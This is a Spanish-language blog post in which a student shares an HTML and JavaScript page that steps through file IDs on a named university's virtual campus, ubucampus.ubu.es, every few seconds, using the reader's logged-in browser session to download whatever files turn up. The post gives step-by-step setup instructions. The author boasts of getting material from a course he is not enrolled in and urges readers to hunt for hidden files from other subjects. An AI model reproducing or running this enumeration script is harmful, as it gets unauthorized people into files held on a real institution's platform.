He estado trasteando sobre cómo se podrían descargar archivos que los profesores cuelgan en el campus virtual, Ubunet. He intentado hacerlo con un bucle en bash y el comando wget de Linux, incrementando la ID del fichero, pero no funcionaba, porque la sesión que Ubunet almacena es la del navegador, por lo cual a través de un script bash no es posible hacerlo: había que hacerlo a través del navegador, que es el que tiene la sesión.

Pues bien, he dado con una solución basada en javascript y html.

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
	<head>
		<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
		<title>Ubunet descarga cada X segundos</title>
		<script type="text/javascript">
			var contadorinicial = 90000;
			var url = "https://ubucampus.ubu.es/ubu/g_launcher.php?id_scos="
 
			function contador(){
				document.getElementById('urlinput').value = contadorinicial;
				contadorinicial++;
				window.open (url+contadorinicial, "mywindow","status=1,toolbar=1");
			}
		</script>
	</head>
	<body onLoad="setInterval('contador()',3000);">
		<h1>Descargar de ubunet a partir de la URL:</h1>
		<form>
			<input id="urlinput" name="urlinput" ><br><br>
		</form>
	</body>
</html>

Se trata de un archivo html que almacena una ID javascript ‘contadorinicial’, por defecto os la dejo puesta a 90000, pero lo podéis cambiar por lo que queráis.

Después en la etiqueta body, hay una llamada a la función setInterval(), con un valor 3000, eso son 3 segundos, quiere decir, que cada 3 segundos va a intentar abrir una nueva ventana con la ID siguiente a la anterior, si esto os parece mucho tiempo, y queréis poner 1 segundo, tan sólo cambiad el 3000 por 1000.

Para hacerlo funcionar, tenéis que copiar el código de arriba, pegarlo en un editor de texto y guardarlo con el nombre que queráis pero con extensión html.

Después os logueais en Ubunet, y pincháis en Ubucampus Electrónico, para que establezca la sesión en vuestro navegador. Acto seguido abrís el documento html que acabáis de guardar en otra pestaña del navegador y le dais a ‘permitir que se abran ventanas emergentes’. Cuando encuentre algún archivo para descargar, os aparecerá el típico mensaje sobre si queréis descargarlo o abrirlo con el programa correspondiente. Le dais a guardar, pero seleccionáis la opción ‘hacer esto para el resto de los archivos’, de esta manera os guardará automáticamente todos los archivos y no os aburrirá preguntando si lo queréis abrir o guardar.

Deciros que he lo dejé el otro día funcionando y se me descargó un paquete de Mepro, y eso que yo no estoy matriculado en la asignatura.

Lo que quiero decir con esto es que la plataforma tiene varios agujeros de seguridad, y posiblemente os podáis descargar archivos ocultos e incluso, como me pasó a mi, de otras asignaturas.

Quién sabe si igual encontráis archivos útiles o curiosos.

Saludos.